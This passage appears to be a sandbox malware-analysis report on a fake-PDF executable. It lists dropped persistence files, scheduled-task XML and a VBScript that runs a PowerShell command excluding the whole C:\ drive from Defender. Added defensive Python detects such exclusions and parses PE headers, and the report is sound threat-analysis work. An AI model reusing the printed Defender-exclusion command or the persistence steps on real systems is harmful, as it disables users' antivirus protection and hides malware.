SHA-512: 485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
Malicious: false
Reputation: unknown
                              Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..

C:\Users\user\AppData\Local\Temp\RegAsm.exe
Process: C:\Users\user\Desktop\Paymentcheck.pdf.exe
File Type: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category: dropped
Size (bytes): 64616
Entropy (8bit): 6.037264560032456
Encrypted: false
SSDEEP: 768:J8XcJiMjm2ieHlPyCsSuJbn8dBhFVBSMQ6Iq8TSYDKpgLaDViRLNdr:9YMaNylPYSAb8dBnTHv8DKKaDVkX
MD5: 6FD7592411112729BF6B1F2F6C34899F
SHA1: 5E5C839726D6A43C478AB0B95DBF52136679F5EA
SHA-256: FFE4480CCC81B061F725C54587E9D1BA96547D27FE28083305D75796F2EB3E74
SHA-512: 21EFCC9DEE3960F1A64C6D8A44871742558666BB792D77ACE91236C7DBF42A6CA77086918F363C4391D9C00904C55A952E2C18BE5FA1A67A509827BFC630070D
Malicious: true
Antivirus:
• Antivirus: Virustotal, Detection: 0%
• Antivirus: Metadefender, Detection: 0%
• Antivirus: ReversingLabs, Detection: 0%
Reputation: unknown

C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs
Process: C:\Users\user\Desktop\Paymentcheck.pdf.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 183
Entropy (8bit): 4.996304200597312
Encrypted: false
SSDEEP: 3:FER/n0eFHgSSJJF2uV1HeGAFddGeWLCXknRAut+kiEaKC5SufyM1K/RFofD6TRWx:FER/lFHsCu/eGgdEYmRAuwknaZ5SuH1D
MD5: 7A70E43727FA98EE052774DD83D19A21
SHA1: 17B818FD7465E1EBBAFBFDAD7645B9B1B4916F71
SHA-256: B89E52891531303B67688453F3C3CF35A703347A79E42BC19B4CD028815A6620
SHA-512: B36610E59CD7EBEFE413E3895B88BD184DC8A386F35A568F73D0A4C3E98F5BA04ED9F8CD124886C709469EA57F22192A57EFF627B1928D6B36733EE2F33C6986
Malicious: true
Reputation: unknown
                              Preview: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'", 0, False

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kehsj010.euk.psm1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: unknown
                              Preview: 1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wciuifo5.2ha.ps1
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: very short file (no magic)
Category: dropped
Size (bytes): 1
Entropy (8bit): 0.0
Encrypted: false
SSDEEP: 3:U:U
MD5: C4CA4238A0B923820DCC509A6F75849B
SHA1: 356A192B7913B04C54574D18C28D46E6395428AB
SHA-256: 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512: 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious: false
Reputation: unknown
                              Preview: 1
                              C:\Users\user\AppData\Local\Temp\tmp715E.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1307
                              Entropy (8bit):5.101975891238948
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0Yfa5xtn:cbk4oL600QydbQxIYODOLedq3ja5j
                              MD5:36C3A95160862C73B9B16754B2473BAF
                              SHA1:5957A8FD60A7100853CEC24FA250F95BD0CE6379
                              SHA-256:2B59AC4D549FB914694F5BE05D2668666C546ACAAD5855703D0C0DCDBC57068D
                              SHA-512:CFF3F0A3A2BFBE57F95CAC2DE28CC9C10A0DAE141040EEE01819F96C4218179841B7E50C44F225CF20144A94D5F734138BC0BF049D889F4314B394629B10D6BC
                              Malicious:true
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1310
                              Entropy (8bit):5.109425792877704
                              Encrypted:false
                              SSDEEP:24:2dH4+S/4oL600QlMhEMjn5pwjVLUYODOLG9RJh7h8gK0R3xtn:cbk4oL600QydbQxIYODOLedq3S3j
                              MD5:5C2F41CFC6F988C859DA7D727AC2B62A
                              SHA1:68999C85FC7E37BAB9216E0099836D40D4545C1C
                              SHA-256:98B6E66B6C2173B9B91FC97FE51805340EFDE978B695453742EBAB631018398B
                              SHA-512:B5DA5DA378D038AFBF8A7738E47921ED39F9B726E2CAA2993D915D9291A3322F94EFE8CCA6E7AD678A670DB19926B22B20E5028460FCC89CEA7F6635E7557334
                              Malicious:false
                              Reputation:unknown
                              Preview: <?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo />.. <Triggers />.. <Principals>.. <Principal id="Author">.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>true</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabled>.. <Hidden>false</Hidden>.. <RunOnlyIfIdle>false</RunOnlyIfIdle>.. <Wak
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):232
                              Entropy (8bit):7.024371743172393
                              Encrypted:false
                              SSDEEP:6:X4LDAnybgCFcpJSQwP4d7ZrqJgTFwoaw+9XU4:X4LEnybgCFCtvd7ZrCgpwoaw+Z9
                              MD5:32D0AAE13696FF7F8AF33B2D22451028
                              SHA1:EF80C4E0DB2AE8EF288027C9D3518E6950B583A4
                              SHA-256:5347661365E7AD2C1ACC27AB0D150FFA097D9246BB3626FCA06989E976E8DD29
                              SHA-512:1D77FC13512C0DBC4EFD7A66ACB502481E4EFA0FB73D0C7D0942448A72B9B05BA1EA78DDF0BE966363C2E3122E0B631DB7630D044D08C1E1D32B9FB025C356A5
                              Malicious:false
                              Reputation:unknown
                              Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.....@.3..{...grv+V...B.......].P...W.4C}uL.....s~..F...}......E......E...6E.....{...{.yS...7..".hK.!.x.2..i..zJ... ....f..?._....0.:e[7w{1.!.4.....&.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:Non-ISO extended-ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):8
                              Entropy (8bit):3.0
                              Encrypted:false
                              SSDEEP:3:Fn4:2
                              MD5:8B3B9D6BBA20F384B042BE6D1B0558BE
                              SHA1:411EBC808586DA365028E37A1619FEFFB20B7247
                              SHA-256:543DFB4810139C95BEAA208EFFCCAEE38F6694A71391AFD0E584F87D17FEE8F8
                              SHA-512:E8B0F322CC92C23FCF6D57C04E33C08001F867D2F5B2203A1E1EC3BBA06CB4D4A9A3E6D07797C60D849CF4845EA85FD1533366AA07F66708C97CBBE71BD5077B
                              Malicious:true
                              Reputation:unknown
                              Preview: .1?.GV.H
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):40
                              Entropy (8bit):5.153055907333276
                              Encrypted:false
                              SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                              MD5:4E5E92E2369688041CC82EF9650EDED2
                              SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                              SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                              SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                              Malicious:false
                              Reputation:unknown
                              Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):327432
                              Entropy (8bit):7.99938831605763
                              Encrypted:true
                              SSDEEP:6144:oX44S90aTiB66x3Pl6nGV4bfD6wXPIZ9iBj0UeprGm2d7Tm:LkjYGsfGUc9iB4UeprKdnm
                              MD5:7E8F4A764B981D5B82D1CC49D341E9C6
                              SHA1:D9F0685A028FB219E1A6286AEFB7D6FCFC778B85
                              SHA-256:0BD3AAC12623520C4E2031C8B96B4A154702F36F97F643158E91E987D317B480
                              SHA-512:880E46504FCFB4B15B86B9D8087BA88E6C4950E433616EBB637799F42B081ABF6F07508943ECB1F786B2A89E751F5AE62D750BDCFFDDF535D600CF66EC44E926
                              Malicious:false
                              Reputation:unknown
                              Preview: pT..!..W..G.J..a.).@.i..wpK.so@...5.=.^..Q.oy.=e@9.B...F..09u"3.. 0t..RDn_4d.....E...i......~...|..fX_...Xf.p^......>a..$...e.6:7d.(a.A...=.)*.....{B.[...y%.*..i.Q.<..xt.X..H.. ..HF7g...I.*3.{.n....L.y;i..s-....(5i...........J.5b7}..fK..HV..,...0.... ....n.w6PMl.......v."".v.......#..X.a....../...cC...i..l{>5n.._+.e.d'...}...[..../...D.t..GVp.zz......(...o......b...+`J.{....hS1G.^*I..v&.jm.#u..1..Mg!.E..U.T.....6.2>...6.l.K.w"o..E..."K%{....z.7....<...,....]t.:.....[.Z.u...3X8.QI..j_.&..N..q.e.2...6.R.~..9.Bq..A.v.6.G..#y.....O....Z)G...w..E..k(....+..O..........Vg.2xC......O...jc.....z..~.P...q../.-.'.h.._.cj.=..B.x.Q9.pu.|i4...i...;O...n.?.,. ....v?.5}.OY@.dG|<.._[.69@.2..m..I..oP=...xrK.?............b..5....i&...l.c\b}..Q..O+.V.mJ.....pz....>F.......H...6$...d...|m...N..1.R..B.i..........$....$........CY}..$....r.....H...8...li.....7 P......?h....R.iF..6...q(.@LI.s..+K.....?m..H....*. l..&<}....`|.B....3.....I..o...u1..8i=.z.W..7
                              C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat
                              Process:C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):44
                              Entropy (8bit):4.220128777433188
                              Encrypted:false
                              SSDEEP:3:oNt+kiE2J5xAI0L4A:oNwkn23f0L4A
                              MD5:DEC3CF19509608C057474F6AD7FD7D55
                              SHA1:1829E7C7674B0EB55E32C5D4F57794762CEB62E2
                              SHA-256:BEAEBCA6CB064C7FA901C228281DD1C8A694EF252A178CDF96B9D4E56C4093E9
                              SHA-512:6E258F21C3361168E01C0464DE3C7A100F01E51069F18559BA1280CE9D4302F81B0DF273558EABC165C6547074D74A6C5FDBA86E6841EF3D704F1D43FAD142E7
                              Malicious:false
                              Reputation:unknown
                              Preview: C:\Users\user\AppData\Local\Temp\RegAsm.exe
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Category:dropped
                              Size (bytes):486400
                              Entropy (8bit):7.954045447359108
                              Encrypted:false
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              MD5:B7E3C3C9735D6BA37616D791171FE2DB
                              SHA1:8763C22ED1151EC2C5B584415154EC7E3C50D964
                              SHA-256:91B97FB3F4695FD57C723B537C5B811195F9F99B0AC6033835F75444C36712B9
                              SHA-512:E19725DA6B7673860A1AA22B473FA59C38FC81A989969A11327A708D9289B2695976D3DFE1D6467D429FA3358D5CF0B022C14CA9862CFF68DAE2EEBADEE4C95D
                              Malicious:true
                              Antivirus:
                              • Antivirus: Joe Sandbox ML, Detection: 100%
                              • Antivirus: ReversingLabs, Detection: 33%
                              Reputation:unknown
                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@..................................W..K....`...,........................................................................... ............... ..H............text...D8... ...:.................. ..`.rsrc....,...`.......<..............@..@.reloc...............j..............@..B................ X......H.......`A..\2....../....s..,.............................................(....*..(....*..(....*..(....*..(....*..(....*..(....*..(....*.0..C........(....8....8........E........8....*.(.... ....~x...:....& ....8......s....o....*.0.......... ........8........E....7.......G...82....{....9.... ....~....:....& ....8....*..(....8.....{....o....8.....9.... ....~e...:....&8........0.......... ........8........E....Q...................$...8L...."...A"...As....(.... ....8......(.... .
                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe:Zone.Identifier
                              Process:C:\Users\user\Desktop\Paymentcheck.pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):26
                              Entropy (8bit):3.95006375643621
                              Encrypted:false
                              SSDEEP:3:ggPYV:rPYV
                              MD5:187F488E27DB4AF347237FE461A079AD
                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                              Malicious:true
                              Reputation:unknown
                              Preview: [ZoneTransfer]....ZoneId=0
                              C:\Users\user\Documents\20210803\PowerShell_transcript.377142.Y6wKq0_c.20210803082749.txt
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):944
                              Entropy (8bit):5.321323527131212
                              Encrypted:false
                              SSDEEP:24:BxSA4y7vBZKx2DOXUWM0Viu4muVMzeWkHjeTKKjX4CIym1ZJXfu4muVMzy:BZvvjKoOHUmuakqDYB1Z5mub
                              MD5:82DD5A528149B597B080FDBC21B72677
                              SHA1:D13F18C05FD0FE98A90D68FB2A52A165CCBD8572
                              SHA-256:3982DEA623BA240B8F2DBAAFD89E38EB656FBEE84B72FBAB2F45E0F5D005A41D
                              SHA-512:4C0DBF6F966E4ED438E33464575FFBAFA71B24BF109AAFC8B6D4443327E2CCD70188FF234FE5F4E316731949CFC2F3BF9C0EF9FC6B6F74DF8B70E33FB4ABB20E
                              Malicious:false
                              Reputation:unknown
                              Preview: .**********************..Windows PowerShell transcript start..Start time: 20210803082814..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 377142 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..Process ID: 6860..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210803082815..**********************..PS>Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'..
                              \Device\ConDrv
                              Process:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1049
                              Entropy (8bit):4.2989523990568035
                              Encrypted:false
                              SSDEEP:24:z3U3g4DO/0XZd3Wo3opQ5ZKBQFYVgt7ovrNOYlK:zEw4DBXZxo4ABV+SrUYE
                              MD5:970EE6AEAB63008333D1D883327DA660
                              SHA1:A71E19F66886B1888A183BA1777A23FABAE9822E
                              SHA-256:D270D397EB3CF1173D25795834B240466EFEE213E11B1B31CDC101015AFFCAD9
                              SHA-512:EB49AEE1B4524E6F15C08345A380D7D28DC845DEBA5408A7D034F2F7F5A652C8A2E2FF293BFB307DE87DCC2FAA111BA3BE8BEF9C4752A73DE1835DCD844D39BB
                              Malicious:false
                              Reputation:unknown
                              Preview: Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....Syntax: RegAsm AssemblyName [Options]..Options:.. /unregister Unregister types.. /tlb[:FileName] Export the assembly to the specified type library.. and register it.. /regfile[:FileName] Generate a reg file with the specified name.. instead of registering the types. This option.. cannot be used with the /u or /tlb options.. /codebase Set the code base in the registry.. /registered Only refer to already registered type libraries.. /asmpath:Directory Look for assembly references here.. /nologo Prevents RegAsm from displaying logo.. /silent Silent mode. Prevents displaying of success messages.. /verbose Displays extra information..
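
The dropped VBScript (Preview at the top of this list: CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath C:\,'...\csrsss\msbuildd.exe'", 0, False) and the PowerShell transcript above record the same tamper from two angles: a Defender exclusion for the whole C:\ volume, plus one for the persistence copy msbuildd.exe under the user's Start Menu. The Python below is an added example (mine, not Joe Sandbox output and not code from the sample) that runs a detection over transcript or ScriptBlock text: it extracts the values passed to Set-/Add-MpPreference exclusion parameters and grades each one. The report's own PS> line is the real input; the three extra lines are constructed, and the LOLBin list, the verdict labels and the choice of which -Exclusion*/-Disable* parameters to watch are my assumptions, marked in the code.

```python
import re

# The command recovered in the PowerShell transcript dropped above (real, from the report).
TRANSCRIPT_FROM_REPORT = (
    "PS>Set-MpPreference -ExclusionPath C:\\,"
    "'C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\csrsss\\msbuildd.exe'"
)
# CONSTRUCTED lines, not from the report, so every branch of the scanner is exercised.
CONSTRUCTED_LINES = (
    "PS>Add-MpPreference -ExclusionPath 'C:\\Program Files\\BuildAgent\\work'",
    "PS>Add-MpPreference -ExclusionProcess RegAsm.exe -Force",
    "PS>Set-MpPreference -DisableRealtimeMonitoring $true",
)

CMDLET = re.compile(r"\b(Set|Add)-MpPreference\b", re.I)
# Value run after -Exclusion*: everything up to the next " -Parameter" or end of line.
EXCLUSION = re.compile(
    r"-Exclusion(?P<kind>Path|Process|Extension)\s+(?P<val>.*?)(?=\s+-[A-Za-z]|\s*$)", re.I)
DISABLE = re.compile(
    r"-Disable(?P<what>RealtimeMonitoring|IOAVProtection|BehaviorMonitoring|ScriptScanning)\s+\$true", re.I)
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\?$")
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Users\\Public|ProgramData|Downloads)\\", re.I)
# Assumed watch-list of binaries attackers exclude so their injected code goes unscanned.
LOLBINS = {"powershell.exe", "regasm.exe", "regsvcs.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe", "cmd.exe", "installutil.exe"}
SCRIPT_EXT = {"exe", "dll", "ps1", "vbs", "js", "scr", "bat", "cmd"}


def _split_args(s):
    """Split a comma-separated PowerShell argument list, keeping quoted commas and spaces intact."""
    items, buf, quote = [], [], None
    for ch in s:
        if quote:
            if ch == quote:
                quote = None
            else:
                buf.append(ch)
        elif ch in "'\"":
            quote = ch
        elif ch == ",":
            items.append("".join(buf).strip())
            buf = []
        else:
            buf.append(ch)
    items.append("".join(buf).strip())
    return [i for i in items if i]


def classify(kind, value):
    """Verdict for one exclusion value (labels are this example's own), or 'low'."""
    if kind == "path":
        if DRIVE_ROOT.match(value):
            return "drive_root"            # whole volume excluded: Defender is effectively off
        if USER_WRITABLE.search(value):
            return "user_writable"         # the malware's own drop location is excluded
    elif kind == "process":
        if value.lower().rsplit("\\", 1)[-1] in LOLBINS:
            return "lolbin_process"        # everything that binary opens goes unscanned
    elif kind == "extension":
        if value.lower().lstrip("*.") in SCRIPT_EXT:
            return "executable_extension"
    return "low"


def scan_transcript(text):
    """Return one hit per exclusion value or protection switch found in the text."""
    hits = []
    for line in text.splitlines():
        if not CMDLET.search(line):
            continue
        for m in EXCLUSION.finditer(line):
            kind = m.group("kind").lower()
            for value in _split_args(m.group("val")):
                hits.append({"line": line, "kind": kind, "value": value,
                             "verdict": classify(kind, value)})
        for m in DISABLE.finditer(line):
            hits.append({"line": line, "kind": "disable", "value": m.group("what"),
                         "verdict": "protection_disabled"})
    return hits


if __name__ == "__main__":
    for hit in scan_transcript("\n".join((TRANSCRIPT_FROM_REPORT,) + CONSTRUCTED_LINES)):
        print(f"{hit['verdict']:22} {hit['kind']:9} {hit['value']}")
```

Fed the whole transcript file rather than the single PS> line, the same command appears twice, once in the "Host Application:" header and once after the prompt, so deduplicate on (kind, value) before alerting. The drive-root verdict is the one worth paging on: an exclusion for C:\ is never a legitimate administrative setting, and here it lands before the RegAsm.exe injection and the C2 traffic recorded further down.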

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.954045447359108
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:Paymentcheck.pdf.exe
                              File size:486400
                              MD5:b7e3c3c9735d6ba37616d791171fe2db
                              SHA1:8763c22ed1151ec2c5b584415154ec7e3c50d964
                              SHA256:91b97fb3f4695fd57c723b537c5b811195f9f99b0ac6033835f75444c36712b9
                              SHA512:e19725da6b7673860a1aa22b473fa59c38fc81a989969a11327a708d9289b2695976d3dfe1d6467d429fa3358d5cf0b022c14ca9862cff68dae2eebadee4c95d
                              SSDEEP:12288:N/vJVn4mZTs+EWEI69JHelW2Mm3XrtJ7aneX:tMmZTs+qVGWtm35N
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....f/...............0..:...0......>X... ...`....@.. ....................................@................................

                              File Icon

                              Icon Hash:4e9292f2c88cd3cc

                              Static PE Info

                              General

                              Entrypoint:0x47583e
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                              Time Stamp:0xBB2F66FF [Sun Jul 7 18:05:51 2069 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:v4.0.30319
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
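
The Static PE Info block above is what a parser reads straight out of the COFF and optional headers. As an added example (mine, not Joe Sandbox output and not code from the sample), the Python below does that for a PE32 image and attaches the two triage findings this particular header invites: the TimeDateStamp 0xBB2F66FF decodes to July 2069, after the analysis date, so it cannot be a genuine link time, and the entry point 0x47583e is the image base 0x400000 plus an RVA that falls inside .text. Because the sample itself is not on this page, the input is a constructed bare header populated with the values listed above (no code, no import table); the flag tables, finding names and the 2021-08-03 reference date are my assumptions.

```python
import struct
from datetime import datetime, timezone

# Flag names for the two characteristics words the report decodes above.
IMAGE_FILE_FLAGS = {0x0002: "EXECUTABLE_IMAGE", 0x0004: "LINE_NUMS_STRIPPED",
                    0x0008: "LOCAL_SYMS_STRIPPED", 0x0100: "32BIT_MACHINE", 0x2000: "DLL"}
DLL_CHAR_FLAGS = {0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT", 0x0400: "NO_SEH",
                  0x8000: "TERMINAL_SERVER_AWARE"}
# Day of the sandbox run recorded in this report (assumed reference): a link
# time later than the analysis itself cannot be genuine.
ANALYSIS_DATE = datetime(2021, 8, 3, tzinfo=timezone.utc)


def _flags(word, table):
    return sorted(name for bit, name in table.items() if word & bit)


def parse_pe32(data):
    """Pull the COFF header, PE32 optional header and section table out of raw bytes."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    machine, nsec, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) optional headers are handled here")
    entry_rva = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    dll_chars = struct.unpack_from("<H", data, opt + 70)[0]
    sections = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        sections.append({"name": f[0].rstrip(b"\x00").decode("ascii", "replace"),
                         "vsize": f[1], "va": f[2], "raw": f[3], "chars": f[9]})
    return {"machine": machine, "timestamp": stamp, "characteristics": chars,
            "entry_rva": entry_rva, "image_base": image_base,
            "dll_characteristics": dll_chars, "sections": sections}


def triage(data, analysis_date=ANALYSIS_DATE):
    """Decode the header the way the report's Static PE Info does and add findings."""
    pe = parse_pe32(data)
    link_time = datetime.fromtimestamp(pe["timestamp"], tz=timezone.utc)
    entry_rva = pe["entry_rva"]
    entry_section = next((s["name"] for s in pe["sections"]
                          if s["va"] <= entry_rva < s["va"] + max(s["vsize"], s["raw"])), None)
    findings = []
    if link_time > analysis_date:
        findings.append("future_timestamp")        # forged or randomised TimeDateStamp
    if entry_section is None:
        findings.append("entry_outside_sections")  # entry point backed by no section
    return {"timestamp_utc": link_time.isoformat(),
            "entry_va": pe["image_base"] + entry_rva,  # VA, as the report prints it
            "entry_section": entry_section,
            "image_characteristics": _flags(pe["characteristics"], IMAGE_FILE_FLAGS),
            "dll_characteristics": _flags(pe["dll_characteristics"], DLL_CHAR_FLAGS),
            "sections": pe["sections"], "findings": findings}


def build_constructed_header():
    """CONSTRUCTED input: a bare PE32 header carrying the values the report lists
    for Paymentcheck.pdf.exe.  It is not the sample and contains no code."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    # Machine i386, 3 sections, TimeDateStamp, no symbols, PE32 optional header,
    # Characteristics = EXECUTABLE_IMAGE|LINE_NUMS_STRIPPED|LOCAL_SYMS_STRIPPED|32BIT_MACHINE
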